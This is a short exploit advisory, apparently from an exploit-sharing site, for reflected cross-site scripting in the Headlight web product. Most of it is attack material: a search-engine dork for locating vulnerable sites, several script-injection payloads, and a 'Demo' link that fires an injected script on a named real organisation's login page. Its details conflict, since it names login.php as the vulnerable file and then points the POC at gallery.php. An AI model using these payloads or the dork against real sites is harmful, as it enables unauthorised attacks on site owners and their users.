[+] Title: headlight Cross Site Scripting (XSS)
[+] date: 2021-01-31
[+] Author: h4shur
[+] Vendor Homepage: https://headlightdata.com/
[+] Tested on: Windows 10 & Google Chrome
[+] Vulnerable File: /login.php?msg=
[+] Vulnerable Parameter: Get Method
[+] Dork: intext:"Powered by Headlight"
intext:"Powered by Headlight" inurl:"/login.php?msg="
### POC:
[+} site.com/gallery.php?img=
### Xss Alert Code: "><script>alert()</script>
"><svg onload=alert()>
<IMG "'"><script>alert()</script>'>
And Etc.
### Demo:
[+] https://www.datadsmusa.com/member/login.php?msg=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
### thanks to :
* s433d3h
### Contact Me :
* Email : h4shursec@gmail.com
* twitter : @h4shur
* Telegram : @h4shur
* Instagram : @netedit0r